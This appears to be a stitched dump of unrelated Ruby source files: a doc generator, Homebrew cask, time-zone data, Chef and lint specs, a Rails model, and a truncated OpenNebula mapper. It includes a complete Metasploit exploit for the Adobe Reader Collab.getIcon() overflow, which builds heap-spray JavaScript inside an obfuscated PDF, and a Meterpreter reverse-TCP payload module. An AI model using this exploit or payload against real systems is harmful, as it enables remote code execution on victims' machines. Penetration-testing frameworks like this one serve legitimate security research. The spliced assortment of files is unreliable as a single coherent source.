puts "OK"
rescue => ex
fails << atomic_yaml['atomic_yaml_path']
puts "FAIL\n#{ex}\n#{ex.backtrace.join("\n")}"
end
end
puts
puts "Generated docs for #{oks.count} techniques, #{fails.count} failures"
generate_attack_matrix! 'All', "#{File.dirname(File.dirname(__FILE__))}/atomics/matrix.md"
generate_attack_matrix! 'Windows', "#{File.dirname(File.dirname(__FILE__))}/atomics/windows-matrix.md", only_platform: /windows/
generate_attack_matrix! 'macOS', "#{File.dirname(File.dirname(__FILE__))}/atomics/macos-matrix.md", only_platform: /macos/
generate_attack_matrix! 'Linux', "#{File.dirname(File.dirname(__FILE__))}/atomics/linux-matrix.md", only_platform: /^(?!windows|macos).*$/
generate_index! 'All', "#{File.dirname(File.dirname(__FILE__))}/atomics/index.md"
generate_index! 'Windows', "#{File.dirname(File.dirname(__FILE__))}/atomics/windows-index.md", only_platform: /windows/
generate_index! 'macOS', "#{File.dirname(File.dirname(__FILE__))}/atomics/macos-index.md", only_platform: /macos/
generate_index! 'Linux', "#{File.dirname(File.dirname(__FILE__))}/atomics/linux-index.md", only_platform: /^(?!windows|macos).*$/
generate_yaml_index! "#{File.dirname(File.dirname(__FILE__))}/atomics/index.yaml"
return oks, fails
end
#
# Generates Markdown documentation for a specific technique from its YAML source
#
def generate_technique_docs!(atomic_yaml, output_doc_path)
technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique'))
technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase
template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_doc_template.md.erb"), nil, "-"
generated_doc = template.result(binding)
print " => #{output_doc_path} => "
File.write output_doc_path, generated_doc
end
#
# Generates Markdown documentation for a specific technique from its YAML source
#
def generate_technique_execution_docs!(atomic_yaml, output_doc_path)
FileUtils.mkdir_p File.dirname(output_doc_path)
technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique'))
technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase
template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_execution_template.html.erb"), nil, "-"
generated_doc = template.result(binding)
print " => #{output_doc_path} => "
File.write output_doc_path, generated_doc
end
#
# Generates a Markdown ATT&CK documentation matrix for all techniques
#
def generate_attack_matrix!(title_prefix, output_doc_path, only_platform: /.*/)
result = ''
result += "# #{title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
result += "| #{ATTACK_API.ordered_tactics.join(' | ')} |\n"
result += "|#{'-----|' * ATTACK_API.ordered_tactics.count}\n"
ATTACK_API.ordered_tactic_to_technique_matrix(only_platform: only_platform).each do |row_of_techniques|
row_values = row_of_techniques.collect do |technique|
if technique
ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: false)
end
end
result += "| #{row_values.join(' | ')} |\n"
end
File.write output_doc_path, result
puts "Generated ATT&CK matrix at #{output_doc_path}"
end
#
# Generates a master Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests
#
def generate_index!(title_prefix, output_doc_path, only_platform: /.*/)
result = ''
result += "# #{title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
ATTACK_API.techniques_by_tactic(only_platform: only_platform).each do |tactic, techniques|
result += "# #{tactic}\n"
techniques.each do |technique|
result += "- #{ATOMIC_RED_TEAM.github_link_to_technique(technique, include_identifier: true, link_new_to_contrib: true)}\n"
ATOMIC_RED_TEAM.atomic_tests_for_technique(technique).each_with_index do |atomic_test, i|
next unless atomic_test['supported_platforms'].any? {|platform| platform.downcase =~ only_platform}
result += " - Atomic Test ##{i+1}: #{atomic_test['name']} [#{atomic_test['supported_platforms'].join(', ')}]\n"
end
end
result += "\n"
end
File.write output_doc_path, result
puts "Generated Atomic Red Team index at #{output_doc_path}"
end
#
# Generates a master YAML index of ATT&CK Tactic -> Technique -> Atomic Tests
#
def generate_yaml_index!(output_doc_path)
result = {}
ATTACK_API.techniques_by_tactic.each do |tactic, techniques|
result[tactic] = techniques.collect do |technique|
[
technique['identifier'],
{
'technique' => technique,
'atomic_tests' => ATOMIC_RED_TEAM.atomic_tests_for_technique(technique)
}
]
end.to_h
end
File.write output_doc_path, JSON.parse(result.to_json).to_yaml # shenanigans to eliminate YAML aliases
puts "Generated Atomic Red Team YAML index at #{output_doc_path}"
end
end
#
# MAIN
#
oks, fails = AtomicRedTeamDocs.new.generate_all_the_docs!
exit fails.count | 39.705128 | 174 | 0.702777 |
6a69250efe1513e35acf6e661760238bb44f8697 | 1,314 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902836
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter, Reverse TCP Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>',
'Brent Cook <brent_cook[at]rapid7.com>',
'timwr'
],
'Platform' => 'linux',
'Arch' => ARCH_ARMBE,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_armbe_Linux
)
)
end
def generate
opts = {
scheme: 'tcp',
stageless: true
}
MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec
end
end
| 27.957447 | 98 | 0.629376 |
03ef402038f1098e491e8c09a4627bb49cbb6802 | 927 | cask "linear-linear" do
version "1.5.1"
sha256 :no_check
if Hardware::CPU.intel?
url "https://desktop.linear.app/mac/dmg/x64"
livecheck do
url "https://desktop.linear.app/mac/dmg/x64"
strategy :header_match
regex(/Linear\s*(\d+(?:\.\d+)*?)[._-]x64.dmg/)
end
else
url "https://desktop.linear.app/mac/dmg/arm64"
livecheck do
url "https://desktop.linear.app/mac/dmg/arm64"
strategy :header_match
regex(/Linear\s*(\d+(?:\.\d+)*?)[._-]arm64.dmg/)
end
end
name "Linear"
desc "App to manage software development and track bugs"
homepage "https://linear.app/"
auto_updates true
app "Linear.app"
zap trash: [
"~/Library/Application Support/Linear",
"~/Library/Caches/com.linear",
"~/Library/Caches/com.linear.ShipIt",
"~/Library/Preferences/com.linear.plist",
"~/Library/Saved Application State/com.linear.savedState",
]
end
| 23.769231 | 62 | 0.638619 |
ed99f878c6850b52a6f9b918b8581a645cb173c7 | 10,108 | # encoding: UTF-8
module TZInfo
module Definitions
module Europe
module Rome
include TimezoneDefinition
timezone 'Europe/Rome' do |tz|
tz.offset :o0, 2996, 0, :LMT
tz.offset :o1, 2996, 0, :RMT
tz.offset :o2, 3600, 0, :CET
tz.offset :o3, 3600, 3600, :CEST
tz.transition 1866, 9, :o1, 51901915651, 21600
tz.transition 1893, 10, :o2, 57906443, 24
tz.transition 1916, 6, :o3, 58104443, 24
tz.transition 1916, 9, :o2, 29053649, 12
tz.transition 1917, 3, :o3, 58111667, 24
tz.transition 1917, 9, :o2, 29058029, 12
tz.transition 1918, 3, :o3, 58119899, 24
tz.transition 1918, 10, :o2, 29062481, 12
tz.transition 1919, 3, :o3, 58128467, 24
tz.transition 1919, 10, :o2, 29066837, 12
tz.transition 1920, 3, :o3, 58137707, 24
tz.transition 1920, 9, :o2, 29071037, 12
tz.transition 1940, 6, :o3, 58315091, 24
tz.transition 1942, 11, :o2, 58335973, 24
tz.transition 1943, 3, :o3, 58339501, 24
tz.transition 1943, 10, :o2, 58344037, 24
tz.transition 1944, 4, :o3, 58348405, 24
tz.transition 1944, 9, :o2, 58352413, 24
tz.transition 1945, 4, :o3, 58357141, 24
tz.transition 1945, 9, :o2, 58361123, 24
tz.transition 1946, 3, :o3, 58365517, 24
tz.transition 1946, 10, :o2, 58370389, 24
tz.transition 1947, 3, :o3, 58374251, 24
tz.transition 1947, 10, :o2, 58379123, 24
tz.transition 1948, 2, :o3, 58382653, 24
tz.transition 1948, 10, :o2, 58387861, 24
tz.transition 1966, 5, :o3, 58542419, 24
tz.transition 1966, 9, :o2, 29272721, 12
tz.transition 1967, 5, :o3, 58551323, 24
tz.transition 1967, 9, :o2, 58554179, 24
tz.transition 1968, 5, :o3, 58560059, 24
tz.transition 1968, 9, :o2, 58562915, 24
tz.transition 1969, 5, :o3, 58568963, 24
tz.transition 1969, 9, :o2, 58571819, 24
tz.transition 1970, 5, :o3, 12956400
tz.transition 1970, 9, :o2, 23238000
tz.transition 1971, 5, :o3, 43801200
tz.transition 1971, 9, :o2, 54687600
tz.transition 1972, 5, :o3, 75855600
tz.transition 1972, 9, :o2, 86742000
tz.transition 1973, 6, :o3, 107910000
tz.transition 1973, 9, :o2, 118191600
tz.transition 1974, 5, :o3, 138754800
tz.transition 1974, 9, :o2, 149641200
tz.transition 1975, 5, :o3, 170809200
tz.transition 1975, 9, :o2, 181090800
tz.transition 1976, 5, :o3, 202258800
tz.transition 1976, 9, :o2, 212540400
tz.transition 1977, 5, :o3, 233103600
tz.transition 1977, 9, :o2, 243990000
tz.transition 1978, 5, :o3, 265158000
tz.transition 1978, 9, :o2, 276044400
tz.transition 1979, 5, :o3, 296607600
tz.transition 1979, 9, :o2, 307494000
tz.transition 1980, 4, :o3, 323830800
tz.transition 1980, 9, :o2, 338950800
tz.transition 1981, 3, :o3, 354675600
tz.transition 1981, 9, :o2, 370400400
tz.transition 1982, 3, :o3, 386125200
tz.transition 1982, 9, :o2, 401850000
tz.transition 1983, 3, :o3, 417574800
tz.transition 1983, 9, :o2, 433299600
tz.transition 1984, 3, :o3, 449024400
tz.transition 1984, 9, :o2, 465354000
tz.transition 1985, 3, :o3, 481078800
tz.transition 1985, 9, :o2, 496803600
tz.transition 1986, 3, :o3, 512528400
tz.transition 1986, 9, :o2, 528253200
tz.transition 1987, 3, :o3, 543978000
tz.transition 1987, 9, :o2, 559702800
tz.transition 1988, 3, :o3, 575427600
tz.transition 1988, 9, :o2, 591152400
tz.transition 1989, 3, :o3, 606877200
tz.transition 1989, 9, :o2, 622602000
tz.transition 1990, 3, :o3, 638326800
tz.transition 1990, 9, :o2, 654656400
tz.transition 1991, 3, :o3, 670381200
tz.transition 1991, 9, :o2, 686106000
tz.transition 1992, 3, :o3, 701830800
tz.transition 1992, 9, :o2, 717555600
tz.transition 1993, 3, :o3, 733280400
tz.transition 1993, 9, :o2, 749005200
tz.transition 1994, 3, :o3, 764730000
tz.transition 1994, 9, :o2, 780454800
tz.transition 1995, 3, :o3, 796179600
tz.transition 1995, 9, :o2, 811904400
tz.transition 1996, 3, :o3, 828234000
tz.transition 1996, 10, :o2, 846378000
tz.transition 1997, 3, :o3, 859683600
tz.transition 1997, 10, :o2, 877827600
tz.transition 1998, 3, :o3, 891133200
tz.transition 1998, 10, :o2, 909277200
tz.transition 1999, 3, :o3, 922582800
tz.transition 1999, 10, :o2, 941331600
tz.transition 2000, 3, :o3, 954032400
tz.transition 2000, 10, :o2, 972781200
tz.transition 2001, 3, :o3, 985482000
tz.transition 2001, 10, :o2, 1004230800
tz.transition 2002, 3, :o3, 1017536400
tz.transition 2002, 10, :o2, 1035680400
tz.transition 2003, 3, :o3, 1048986000
tz.transition 2003, 10, :o2, 1067130000
tz.transition 2004, 3, :o3, 1080435600
tz.transition 2004, 10, :o2, 1099184400
tz.transition 2005, 3, :o3, 1111885200
tz.transition 2005, 10, :o2, 1130634000
tz.transition 2006, 3, :o3, 1143334800
tz.transition 2006, 10, :o2, 1162083600
tz.transition 2007, 3, :o3, 1174784400
tz.transition 2007, 10, :o2, 1193533200
tz.transition 2008, 3, :o3, 1206838800
tz.transition 2008, 10, :o2, 1224982800
tz.transition 2009, 3, :o3, 1238288400
tz.transition 2009, 10, :o2, 1256432400
tz.transition 2010, 3, :o3, 1269738000
tz.transition 2010, 10, :o2, 1288486800
tz.transition 2011, 3, :o3, 1301187600
tz.transition 2011, 10, :o2, 1319936400
tz.transition 2012, 3, :o3, 1332637200
tz.transition 2012, 10, :o2, 1351386000
tz.transition 2013, 3, :o3, 1364691600
tz.transition 2013, 10, :o2, 1382835600
tz.transition 2014, 3, :o3, 1396141200
tz.transition 2014, 10, :o2, 1414285200
tz.transition 2015, 3, :o3, 1427590800
tz.transition 2015, 10, :o2, 1445734800
tz.transition 2016, 3, :o3, 1459040400
tz.transition 2016, 10, :o2, 1477789200
tz.transition 2017, 3, :o3, 1490490000
tz.transition 2017, 10, :o2, 1509238800
tz.transition 2018, 3, :o3, 1521939600
tz.transition 2018, 10, :o2, 1540688400
tz.transition 2019, 3, :o3, 1553994000
tz.transition 2019, 10, :o2, 1572138000
tz.transition 2020, 3, :o3, 1585443600
tz.transition 2020, 10, :o2, 1603587600
tz.transition 2021, 3, :o3, 1616893200
tz.transition 2021, 10, :o2, 1635642000
tz.transition 2022, 3, :o3, 1648342800
tz.transition 2022, 10, :o2, 1667091600
tz.transition 2023, 3, :o3, 1679792400
tz.transition 2023, 10, :o2, 1698541200
tz.transition 2024, 3, :o3, 1711846800
tz.transition 2024, 10, :o2, 1729990800
tz.transition 2025, 3, :o3, 1743296400
tz.transition 2025, 10, :o2, 1761440400
tz.transition 2026, 3, :o3, 1774746000
tz.transition 2026, 10, :o2, 1792890000
tz.transition 2027, 3, :o3, 1806195600
tz.transition 2027, 10, :o2, 1824944400
tz.transition 2028, 3, :o3, 1837645200
tz.transition 2028, 10, :o2, 1856394000
tz.transition 2029, 3, :o3, 1869094800
tz.transition 2029, 10, :o2, 1887843600
tz.transition 2030, 3, :o3, 1901149200
tz.transition 2030, 10, :o2, 1919293200
tz.transition 2031, 3, :o3, 1932598800
tz.transition 2031, 10, :o2, 1950742800
tz.transition 2032, 3, :o3, 1964048400
tz.transition 2032, 10, :o2, 1982797200
tz.transition 2033, 3, :o3, 1995498000
tz.transition 2033, 10, :o2, 2014246800
tz.transition 2034, 3, :o3, 2026947600
tz.transition 2034, 10, :o2, 2045696400
tz.transition 2035, 3, :o3, 2058397200
tz.transition 2035, 10, :o2, 2077146000
tz.transition 2036, 3, :o3, 2090451600
tz.transition 2036, 10, :o2, 2108595600
tz.transition 2037, 3, :o3, 2121901200
tz.transition 2037, 10, :o2, 2140045200
tz.transition 2038, 3, :o3, 59172253, 24
tz.transition 2038, 10, :o2, 59177461, 24
tz.transition 2039, 3, :o3, 59180989, 24
tz.transition 2039, 10, :o2, 59186197, 24
tz.transition 2040, 3, :o3, 59189725, 24
tz.transition 2040, 10, :o2, 59194933, 24
tz.transition 2041, 3, :o3, 59198629, 24
tz.transition 2041, 10, :o2, 59203669, 24
tz.transition 2042, 3, :o3, 59207365, 24
tz.transition 2042, 10, :o2, 59212405, 24
tz.transition 2043, 3, :o3, 59216101, 24
tz.transition 2043, 10, :o2, 59221141, 24
tz.transition 2044, 3, :o3, 59224837, 24
tz.transition 2044, 10, :o2, 59230045, 24
tz.transition 2045, 3, :o3, 59233573, 24
tz.transition 2045, 10, :o2, 59238781, 24
tz.transition 2046, 3, :o3, 59242309, 24
tz.transition 2046, 10, :o2, 59247517, 24
tz.transition 2047, 3, :o3, 59251213, 24
tz.transition 2047, 10, :o2, 59256253, 24
tz.transition 2048, 3, :o3, 59259949, 24
tz.transition 2048, 10, :o2, 59264989, 24
tz.transition 2049, 3, :o3, 59268685, 24
tz.transition 2049, 10, :o2, 59273893, 24
tz.transition 2050, 3, :o3, 59277421, 24
tz.transition 2050, 10, :o2, 59282629, 24
end
end
end
end
end
| 46.796296 | 56 | 0.582212 |
337ed1948f4e43becedc621823cd37bcb17eb036 | 2,898 | require 'spec_helper'
require 'f5/icontrol'
require_relative '../../../libraries/vip'
require_relative '../../../libraries/credentials'
require_relative '../../../libraries/gem_helper'
describe 'f5_test::test_create_vip_none_http_profile' do
let(:api) { double('F5::Icontrol') }
let(:server_api) { double('F5::Icontrol::LocalLB::VirtualServer') }
let(:chef_run) do
ChefSpec::SoloRunner.new(
platform: 'centos',
version: '7.2.1511',
step_into: ['f5_vip']
) do |node|
node.normal[:f5][:credentials][:default] = {
host: '1.2.3.4',
username: 'api',
password: 'testing'
}
end.converge(described_recipe)
end
before do
allow(F5::Icontrol::API).to receive(:new) { api }
allow(api)
.to receive_message_chain('LocalLB.VirtualServer') { server_api }
allow_any_instance_of(Chef::RunContext::CookbookCompiler)
.to receive(:compile_libraries).and_return(true)
stub_data_bag_item('f5', 'default')
.and_return(host: '1.2.3.4', username: 'api', password: 'testing')
allow(server_api).to receive(:get_rule).and_return({item: {}})
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '86.75.30.9', port: '80' } }
}
end
context 'when managing the vip' do
before do
allow(server_api).to receive(:get_profile) {
{ item: { item: {profile_type: 'PROFILE_TYPE_HTTP', profile_context: 'PROFILE_CONTEXT_TYPE_ALL', profile_name: '/Common/http'} }}
}
# these vips have their SAT set to None
allow(server_api)
.to receive(:get_source_address_translation_type) {
{ item: [
F5::Icontrol::LocalLB::VirtualServer::SourceAddressTranslationType::SRC_TRANS_NONE
]}}
end
context 'and the vip has an http profile' do
before do
allow(server_api).to receive(:get_list) {
{ item: ['/Common/myvip'] }
}
end
it 'deletes the http profile' do
allow_any_instance_of(ChefF5::VIP).to receive(:vip_default_pool)
allow_any_instance_of(ChefF5::VIP).to receive(:set_vip_pool)
expect(server_api).to receive(:remove_profile).with(hash_including(profiles: {item: [{item: [hash_including(profile_name: '/Common/http')]}]}))
chef_run
end
end
context 'and the vip does not have an http profile' do
before do
allow(server_api).to receive(:get_list) {
{ item: ['/Common/myvip'] }
}
allow(server_api).to receive(:get_profile) {
{ item: { item: {} } }
}
allow_any_instance_of(ChefF5::VIP).to receive(:vip_default_pool)
allow_any_instance_of(ChefF5::VIP).to receive(:set_vip_pool)
end
it 'does not attempt to delete any http profile' do
expect(server_api).not_to receive(:remove_profile)
chef_run
end
end
end
end
| 32.561798 | 151 | 0.636301 |
216ea4494e06a6ca2b03a729b033f8156290206e | 1,420 | require 'spec_helper'
describe RubyLint::VirtualMachine do
describe 'scoping method definitions' do
example 'process a global method' do
defs = build_definitions('def example; end')
example = defs.lookup(:instance_method, 'example')
example.is_a?(ruby_method).should == true
example.type.should == :instance_method
example.name.should == 'example'
end
example 'process a nested method' do
code = <<-CODE
def first
def second
end
end
CODE
defs = build_definitions(code)
first = defs.lookup(:instance_method, 'first')
first.is_a?(ruby_method).should == true
first.lookup(:instance_method, 'second') \
.is_a?(ruby_method) \
.should == true
defs.lookup(:instance_method, 'second').nil?.should == true
end
example 'process a global and nested method' do
code = <<-CODE
def first
def second
end
end
def third
end
CODE
defs = build_definitions(code)
first = defs.lookup(:instance_method, 'first')
first.lookup(:instance_method, 'second') \
.is_a?(ruby_method) \
.should == true
first.lookup(:instance_method, 'second') \
.lookup(:instance_method, 'third') \
.is_a?(ruby_method) \
.should == true
defs.lookup(:instance_method, 'third') \
.is_a?(ruby_method) \
.should == true
end
end
end | 22.539683 | 65 | 0.621831 |
01acbd7b2d802947fa7bf027f140c6da3a9d7c63 | 1,417 | class Issue < ReportPart
belongs_to :reportable, polymorphic: true
belongs_to :issue_template, required: false
def self.create_from_template(issue_group, issue_template)
Issue.create(
reportable: issue_group,
title: issue_template.title,
description: issue_template.description,
rating: issue_template.rating,
recommendation: issue_template.recommendation,
severity: issue_template.severity,
issue_template: issue_template
)
end
def color
case severity
when 0
'green'
when 1
'blue'
when 2
'orange'
when 3
'red'
when 4
'purple'
else
'grey'
end
end
def color_hex
case severity
when 0
'#3fb079;'
when 1
'#0b5394;'
when 2
'#b45f06;'
when 3
'#990000;'
when 4
'#9900ff;'
else
'#999999;'
end
end
def colorize(text)
result = text.gsub '<color>', "<strong><span style='color: #{color_hex}'>"
result = result.gsub '</color>', "</span></strong>"
result.lstrip.rstrip.lines.join('<br>') # trim spaces at begin and end of the block and replace inner spaces to html-style
end
def clean_text(text)
=begin
result = text.gsub '<color>', ""
result.gsub '</color>', ""
result = text.gsub '<i>', ""
result.gsub '</i>', ""
=end
ActionView::Base.full_sanitizer.sanitize(text.to_s)
end
end
| 20.838235 | 126 | 0.613267 |
4a4fe3093dba1b167242b14878336dd09e80ad2a | 477 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2018_10_01
module Models
#
# Defines values for VirtualNetworkGatewayConnectionType
#
module VirtualNetworkGatewayConnectionType
IPsec = "IPsec"
Vnet2Vnet = "Vnet2Vnet"
ExpressRoute = "ExpressRoute"
VPNClient = "VPNClient"
end
end
end
| 25.105263 | 70 | 0.714885 |
5d4518993a2b0a2630cb91d554d471f922c877c5 | 1,236 | #
# Author:: Joshua Timberman <[email protected]>
# Copyright:: Copyright (c) 2012, Joshua Timberman
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
default['iterm2']['version'] = "-1_0_0_20120123"
default['iterm2']['checksum'] = "1c9ce81fc60c329dee0755d9b5dc7888ea96d1642d244ede2ce6bca3cabd6920"
# Support for iTerm2's tmux integration
default['iterm2']['tmux_enabled'] = false
default['iterm2']['tmux_compile'] = false
default['iterm2']['tmux_version'] = "20120108"
default['iterm2']['tmux_checksum'] = "b97b9426959f18c60225c56ec1400fe48b500c422cef15e154b7ea61c2191cc0"
default['iterm2']['tmux_compiled_checksum'] = "d238e2b03bcfa9c6c6b6d294344eea9ec0dd938f2c915165391a2c3f6909d352"
| 44.142857 | 112 | 0.775081 |
382645e8b7fa5a925d7b3f9fc45cef7a5ce7447a | 693 | # -*- coding: UTF-8 -*-
require 'haml/util'
require 'haml/engine'
module Zorglub
module Engines
module Haml
def self.proc path,obj
if obj.app.opt(:engines_cache_enabled)
key = path.sub obj.app.opt(:root),''
haml = obj.app.engines_cache[key] ||= ::Haml::Engine.new( ::File.open(path,'r'){|f| f.read }, obj.app.opt(:haml_options) )
else
haml = ::Haml::Engine.new( ::File.open(path,'r'){|f| f.read }, obj.app.opt(:haml_options) )
end
html = haml.render(obj)
return html, 'text/html'
end
end
end
end
# EOF
| 28.875 | 142 | 0.496392 |
91042da600b6c1c819116e55c6d80fda673c75ac | 6,280 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Collab.getIcon() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially
crafted pdf that a contains malformed Collab.getIcon() call, an attacker may
be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MC',
'Didier Stevens <didier.stevens[at]gmail.com>',
'jduck'
],
'References' =>
[
[ 'CVE', '2009-0927' ],
[ 'OSVDB', '53647' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-04.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 7.0.5 - no trigger
# reader 7.0.8 - no trigger
# reader 7.0.9 - no trigger
# reader 7.1.0 - no trigger
# reader 7.1.1 - reported not vulnerable
# reader 8.0.0 - works
# reader 8.1.2 - works
# reader 8.1.3 - reported not vulnerable
# reader 9.0.0 - works
# reader 9.1.0 - reported not vulnerable
[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],
],
'DisclosureDate' => 'Mar 24 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape(make_nops(4))
# Randomize variables
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
rand12 = rand_text_alpha(rand(100) + 1)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} ="";
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
#{rand4} = #{rand2} + #{rand1};
#{rand5} = unescape("#{nops}");
#{rand6} = 20;
#{rand7} = #{rand6}+#{rand4}.length
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
#{rand8} = #{rand5}.substring(0, #{rand7});
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
#{rand10} = new Array();
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
var #{rand12} = unescape("%0a");
while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
#{rand12} = "N."+#{rand12};
Collab.getIcon(#{rand12});
|
# Create the pdf
pdf = make_pdf(script)
print_status("Sending #{self.name}")
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
handler(cli)
end
def RandomNonASCIIString(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def ioDef(id)
"%d 0 obj" % id
end
def ioRef(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def nObfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ASCIIHexWhitespaceEncode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << RandomNonASCIIString(4) << eol
xref << pdf.length
pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
xref << pdf.length
pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end
| 30.634146 | 156 | 0.543631 |
0189958ab536662d3b677d7ee581b469e9e8adea | 3,439 | #!/usr/bin/ruby
# -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
$LOAD_PATH.unshift File.dirname(__FILE__)
require 'mapper'
#-------------------------------------------------------------------------------
# These classes implements the mapping of raw filesystems & raw disk images
#-------------------------------------------------------------------------------
class FSRawMapper < Mapper
def do_map(one_vm, disk, _directory)
dsrc = one_vm.disk_source(disk)
File.chmod(0o646, dsrc) if File.symlink?(one_vm.sysds_path)
cmd = "#{COMMANDS[:losetup]} -f --show #{dsrc}"
rc, out, err = Command.execute(cmd, true)
return out.chomp unless rc != 0 || out.empty?
OpenNebula.log_error("#{__method__}: #{err}")
nil
end
def do_unmap(device, _one_vm, _disk, _directory)
cmd = "#{COMMANDS[:losetup]} -d #{device}"
